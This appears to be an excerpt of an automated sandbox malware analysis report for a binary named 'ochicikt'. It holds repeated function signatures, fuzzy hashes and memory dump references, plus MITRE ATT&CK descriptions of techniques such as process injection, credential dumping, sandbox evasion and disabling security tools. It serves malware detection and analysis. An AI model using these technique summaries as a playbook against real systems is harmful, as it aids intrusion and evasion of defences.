Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ca226fc8aa6ea3e1674c47910d43e2a08806468f10572f36c53bf7ea8cfe320a
Instruction ID: e7583f112126ff48aecbc7698c171a6a4fd91419ac41b80f0f7cb2eacd10ddbf
Opcode Fuzzy Hash: ca226fc8aa6ea3e1674c47910d43e2a08806468f10572f36c53bf7ea8cfe320a
Instruction Fuzzy Hash: C3116D20B0DB42C2FB5AB336AA5197AD1535F847F0EC45736F93D06AD5DEACE4018230

Function 00007FF741A8F2C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 292COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8F4C6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741A8F4D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8F6D1

Strings

Nk, xrefs: 00007FF741A8F5AD

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: Nk
API String ID: 3936042273-1353404103
Opcode ID: e8d80581dde1432571f71a7124cfbe3edb6033d107c559a414bede34522c9b6a
Instruction ID: 5309b20e30e38c24c3c10fd7c2b329f4026e38f7a710e1464345a123504951af
Opcode Fuzzy Hash: e8d80581dde1432571f71a7124cfbe3edb6033d107c559a414bede34522c9b6a
Instruction Fuzzy Hash: D0C16C32B18B818AE711EF75E8406ADB3B1FB59798F405626DF8D13B59DF78E1A08310

Function 00007FF741A6CA60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF741A6CACF
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF741A6CB17
_Getctype.LIBCPMT ref: 00007FF741A6CB55

Strings

bad locale name, xrefs: 00007FF741A6CC0E

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: std::_$GetctypeLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1612978173-1405518554
Opcode ID: 68b3b4aef49543be7e967f8a46eee77a839ed02ec3eaa7439e09ef21e6005dd6
Instruction ID: 150e350aca1fccda39427db88c3adda32d1ac7e63616f089b486d7f91f03b65f
Opcode Fuzzy Hash: 68b3b4aef49543be7e967f8a46eee77a839ed02ec3eaa7439e09ef21e6005dd6
Instruction Fuzzy Hash: ED519A32B09B41CAEB12FFB0E4506ACB3A5EF44748F844036DE8D22A99DF78D525D364

Function 00007FF741AFB210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF741AFB8FA), ref: 00007FF741AFB226
GetProcAddress.KERNEL32(?,?,?,00007FF741AFB8FA), ref: 00007FF741AFB236

Strings

kernel32.dll, xrefs: 00007FF741AFB21F
GetTempPath2W, xrefs: 00007FF741AFB22C

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetTempPath2W$kernel32.dll
API String ID: 1646373207-1846531799
Opcode ID: 85c4015c5df5ee79752990f65a767554006cfd6127e60443cb10f02faa6b2ab0
Instruction ID: d0ac0ce2e7599836f8eb87aebf9af76626c20fef621f8ca497ba01d439b4746c
Opcode Fuzzy Hash: 85c4015c5df5ee79752990f65a767554006cfd6127e60443cb10f02faa6b2ab0
Instruction Fuzzy Hash: A5E0E561B1CA46C1DF06BB11F984075A322BF49BC0BD6A035D90E07B24DEBCD455C310

Function 00007FF741ACED00 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741ACEEF4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741ACEF00
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741ACF064
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741ACF070

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 09f5cbd7018476b0edbc4eae570f275d1e4341c64023ae2efe1a22688f47e492
Instruction ID: 7d46a1e620504b48e1ecf174f5523538975acdfd819886220de1f1a91e6a5ba9
Opcode Fuzzy Hash: 09f5cbd7018476b0edbc4eae570f275d1e4341c64023ae2efe1a22688f47e492
Instruction Fuzzy Hash: 9091B472719B85C1EB25BB15E440A6AA794FB44BE4F944636EEAD077C5EFBCD080C320

Function 00007FF741A8CAD0 Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741A8CC02
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8CC08
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8CC65
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8CCAC

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 16453684226a3474efff082235dffcbe28d8d32d975e498cdceeb43ec89aeeb5
Instruction ID: d57d0d2c3ca8db725a1b3a2ec949f51b9347913f81aca1c540f71a279501e9e6
Opcode Fuzzy Hash: 16453684226a3474efff082235dffcbe28d8d32d975e498cdceeb43ec89aeeb5
Instruction Fuzzy Hash: 1941D962B0AB8581FF16BB65D4487BCA251DF44BE0F944632DE7D07BC8DEAC94958330

Function 00007FF741A8B3D0 Relevance: 6.1, APIs: 4, Instructions: 147COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8B528
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8B52E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8B534
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A8B59C

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 86d67e46419dfede659ee00e2f9d14ac24cd865b3d59fb880642de1441aee641
Instruction ID: ecfa25b406310bb88fb7f600fedd9ddb19cebd63cf8c168e74ce509daaa7755a
Opcode Fuzzy Hash: 86d67e46419dfede659ee00e2f9d14ac24cd865b3d59fb880642de1441aee641
Instruction Fuzzy Hash: 4E51BE72719B8181EB09FF28E05466CA3A5FB44F94F944632DBAD07A89CF7CD4A4C364

Function 00007FF741A82C80 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741AFC5EC: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF741AFC609
Part of subcall function 00007FF741AFC5EC: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF741AFC62C

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF741A82CC1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF741A82CE6
std::_Facet_Register.LIBCPMT ref: 00007FF741A82D92
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741A82DF4

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
String ID:
API String ID: 3698853521-0
Opcode ID: 2b067d12cfc5bb765110dbfec384a2e24b70c5744c4f4ff5d98fa56a2f32b8c6
Instruction ID: b61769587931d3a6eb519455a45bc4f84cbc673679a32284599009a12c372706
Opcode Fuzzy Hash: 2b067d12cfc5bb765110dbfec384a2e24b70c5744c4f4ff5d98fa56a2f32b8c6
Instruction Fuzzy Hash: C9417E2171CA41C1EB12FB25E444AB9B7A0FB88B94F841133EA9D43B95DFBCE446C760

Function 00007FF741ACDAA0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741ACDBD4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741ACDBDA

Part of subcall function 00007FF741A6B820: __std_exception_copy.LIBVCRUNTIME ref: 00007FF741A6B868

Strings

unordered_map/set too long, xrefs: 00007FF741ACDF28

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: unordered_map/set too long
API String ID: 2371198981-306623848
Opcode ID: 99b69d53e9e0ae52ec95574048cd643b3c341fd4907670bdd795f3fade48263d
Instruction ID: 66716aef476474d0093a3e9bdc04a3088df202de4141117c1ba2e67bff0403dd
Opcode Fuzzy Hash: 99b69d53e9e0ae52ec95574048cd643b3c341fd4907670bdd795f3fade48263d
Instruction Fuzzy Hash: 58D1E222B0DB85C1EB12BB11D440B79A3A5FB58B94F988632DE5D17780EFB8E491D360

Function 00007FF741A9B198 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A9B382

Strings

iterator does not fit current value, xrefs: 00007FF741A9B3C4
iterator out of range, xrefs: 00007FF741A9B3F8

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: iterator does not fit current value$iterator out of range
API String ID: 3668304517-1046077056
Opcode ID: e7cb99dc10a05794f27b8ceb70a7130b171b50f6f95a473e0ccfbebd3c59cc25
Instruction ID: 842eeb0bab1bd2615e44736e0aa0870619ee4d5d6e00e185e9ce462bde5fc0c2
Opcode Fuzzy Hash: e7cb99dc10a05794f27b8ceb70a7130b171b50f6f95a473e0ccfbebd3c59cc25
Instruction Fuzzy Hash: 2541F3A3B0CA81C6E712FB60C8906EC6761EB51748FD45477CB0D03ADADEB8D59AC364

Function 00007FF741A9B1F5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A9B382

Strings

iterator does not fit current value, xrefs: 00007FF741A9B3C4
iterator out of range, xrefs: 00007FF741A9B3F8

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: iterator does not fit current value$iterator out of range
API String ID: 3668304517-1046077056
Opcode ID: e59c113c566010cad31a47543d46dfa786fc84b42ba5c0c0dc73224f9fd976ec
Instruction ID: 55e790abbbf62ab76e5bc3b6b1af6cbef7eb84129297b99a147ab861f65723d4
Opcode Fuzzy Hash: e59c113c566010cad31a47543d46dfa786fc84b42ba5c0c0dc73224f9fd976ec
Instruction Fuzzy Hash: 3241E3A3B0CA81D6EB12FB60D8906EC6321AB51748FD0547BCB0C03ADADEB8D559C364

Function 00007FF741ADCC10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF741ADCD27
GetLastError.KERNEL32 ref: 00007FF741ADCD49

Strings

U, xrefs: 00007FF741ADCCD3

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 136ebf252562798dd94b0934f5b608a87eddbdd1c89cb1577b5bf7720501d192
Instruction ID: 954b1d1fa71efac8fac30336400ad9ee725dbd4ffca5673a38935e0586726e9d
Opcode Fuzzy Hash: 136ebf252562798dd94b0934f5b608a87eddbdd1c89cb1577b5bf7720501d192
Instruction Fuzzy Hash: C441B322B1CA41C2DB61BF25E8447A9A761FB88784FC14036EE8D87798DFBCD445C760

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
